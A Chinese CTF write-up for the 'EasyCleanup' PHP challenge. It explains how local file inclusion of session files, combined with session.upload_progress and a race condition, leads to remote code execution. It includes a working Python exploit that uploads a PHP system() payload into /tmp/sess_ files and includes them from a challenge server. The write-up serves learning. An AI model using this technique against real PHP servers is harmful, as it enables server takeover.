临时文件包含
[第五空间 2021]EasyCleanup
本题考点
- 利用session.upload_progress进行文件包含
- 条件竞争
今天在NSSCTF平台刷到一道以前从没碰到过的题,记录一下收获。
解题过程
题目源码如下:
<?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell); } if(isset($_GET['file'])){ if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); include $_GET['file']; } function filter($var){ $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; foreach($banned as $ban){ if(strstr($var, $ban)) return True; } return False; } function checkNums($var){ $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $cnt = 0; for($i = 0; $i < strlen($alphanum); $i++){ for($j = 0; $j < strlen($var); $j++){ if($var[$j] == $alphanum[$i]){ $cnt += 1; if($cnt > 8) return True; } } } return False; } ?>
$shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; //是如果?前为真就执行第一个,为假执行第二个phpinfo();
由源码可知,当mode=eval是,若shell无值,则执行phpinfo();若shell有值,则经过过滤后执行shell的代码;file有值时经过过滤后进行文件包含。所以攻击点有两个,一个是变量 shell 的 RCE
,一个是 file 的文件包含,由于 shell 变量需要经过filter($shell) | checkNums($shell),限制太多,想要通过 RCE 得到 flag 几乎无从下手,于是我们考虑从file寻找攻击点,之后看了大佬的博客。
PHP LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如 session 文件、日志文件、临时文件等。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。假如在服务器上找不到我们可以包含的文件,那该怎么办?此时可以通过利用一些技巧让服务存储我们恶意生成的文件,该文件包含我们构造的的恶意代码,此时服务器就存在我们可以包含的文件了。
PHP LFI本地文件包含
概述
文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数。
本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server会将特定文件当成php执行,从而导致用户可获取一定的服务器权限。
首先看利用最方便的日志文件包含,日志文件目录路径一般过长,会被过滤掉而无法包含
session文件包含
然后尝试用session文件包含,一般利用GET传参将我们构造好的恶意代码传入session中的,但没有 GET 传参还能往 session 中写入代码吗?当然可以,php 5.4后添加了 session.upload_progress 功能,这个功能开启意味着当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中,利用这个特性可以将恶意语句写入session文件。
访问/?mode=eval查看 phpinfo 内容,定位到 session 相关的信息,标注箭头处是比较关键的信息
那么讲解一下关键选项
session.auto_start:如果 session.auto_start=On ,则PHP在接收请求的时候会自动初始化 Session,不再需要执行session_start()。但默认情况下,这个选项都是关闭的。但session还有一个默认选项,session.use_strict_mode默认值为 off。此时用户是可以自己定义 Session ID 的。比如,我们在 Cookie 里设置 PHPSESSID=ph0ebus ,PHP 将会在服务器上创建一个文件:/tmp/sess_ph0ebus”。即使此时用户没有初始化Session,PHP也会自动初始化Session。 并产生一个键值,这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的 session.upload_progress.name 值组成,最后被写入 sess_ 文件里。
session.save_path:负责 session 文件的存放位置,后面文件包含的时候需要知道恶意文件的位置,如果没有配置则不会生成session文件
session.upload_progress_enabled:当这个配置为 On 时,代表 session.upload_progress 功能开始,如果这个选项关闭,则这个方法用不了
session.upload_progress_cleanup:这个选项默认也是 On,也就是说当文件上传结束时,session 文件中有关上传进度的信息立马就会被删除掉;这里就给我们的操作造成了很大的困难,我们就只能使用条件竞争(Race Condition)的方式不停的发包,争取在它被删除掉之前就成功利用
session.upload_progress_name:当它出现在表单中,php将会报告上传进度,最大的好处是,它的值可控
session.upload_progress_prefix:它+session.upload_progress_name 将表示为 session 中的键名
看到这里的时候,特别是session.upload.progress.enable这个开启时,就想到了当传入文件上去时,有办法可以进行rce。刚开始时想用条件竞争,直接就用脚本读出来了。
import io import sys import requests import threading host = 'http://114.115.134.72:32770/index.php' sessid = 'aa' def POST(session): while True: f = io.BytesIO(b'a' * 1024 * 50) session.post( host, data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('ls /');echo md5('1');?>"}, files={"file":('a.txt', f)}, cookies={'PHPSESSID':sessid}, ) def READ(session): while True: response = session.get(f'{host}?file=/tmp/sess_{sessid}') # print(response.text) if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text: print('[+++]retry') else: print(response.text) break with requests.session() as session: t1 = threading.Thread(target=POST, args=(session, )) t1.daemon = True t1.start() READ(session)
但其实这道题不用条件竞争也可以做出来,因为session.upload_progress.cleanup没有开启,他不会及时的清理session文件,所以直接传文件,然后用题目中的include包含进去就可以了。
先构造一个传文件的表单,随便传一个文件抓包
浙公网安备 33010602011771号